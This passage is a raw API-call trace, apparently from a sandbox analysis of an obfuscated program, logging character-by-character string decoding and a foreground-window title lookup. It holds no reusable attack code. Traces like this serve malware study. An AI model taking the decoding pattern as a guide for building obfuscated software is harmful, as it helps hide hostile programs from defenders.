lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.612] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0178.612] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.613] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.614] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.614] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.614] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.615] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0178.615] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.616] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.616] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.617] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.617] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.618] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.618] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.619] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.619] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.620] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.620] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.625] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.625] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.625] GetForegroundWindow () returned 0x20086 [0178.625] GetLastError () returned 0x0 [0178.626] SysStringLen (param_1=" ") returned 0xff [0178.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0178.626] SysStringLen (param_1=" ") returned 0xff [0178.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0178.626] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0178.626] GetLastError () returned 0x0 [0178.626] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0178.626] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0178.627] SysStringLen (param_1="Program Manager") returned 0x10 [0178.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Program Manager", cchWideChar=17, lpMultiByteStr=0x1146e74, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Program Manager", lpUsedDefaultChar=0x0) returned 17 [0178.627] SetWindowTextA (hWnd=0x103c4, lpString="Program Manager") returned 1 [0178.627] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0178.628] GetFocus () returned 0x0 [0178.628] lstrlenA (lpString="Program Manager") returned 15 [0178.628] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1146e74) returned 0x1 [0178.628] IsWindow (hWnd=0x103c4) returned 1 [0178.628] IsWindow (hWnd=0x103c4) returned 1 [0178.628] IsWindow (hWnd=0x103c4) returned 1 [0178.629] IsWindow (hWnd=0x103c4) returned 1 [0178.629] GetFocus () returned 0x0 [0178.629] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0178.629] GetFocus () returned 0x0 [0178.629] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10e1d20 [0178.630] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x10, lParam=0x10e1d20) returned 0xf [0178.630] GetFocus () returned 0x0 [0178.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0178.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x1146e74, cchWideChar=16 | out: lpWideCharStr="Program Manager") returned 16 [0178.630] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d20 | out: hHeap=0x10d0000) returned 1 [0178.630] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.631] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0178.632] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.632] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0178.632] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.633] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0178.633] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.634] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.634] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.635] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.635] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.640] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0178.641] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.641] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0178.641] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.642] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.642] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.643] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0178.643] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.644] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0178.644] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.645] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.645] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.646] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.646] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.646] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.647] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.647] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.647] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.648] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0178.648] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.649] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.649] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.650] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.650] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.651] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0178.651] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.657] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.657] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.657] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.658] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.658] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.659] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.659] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 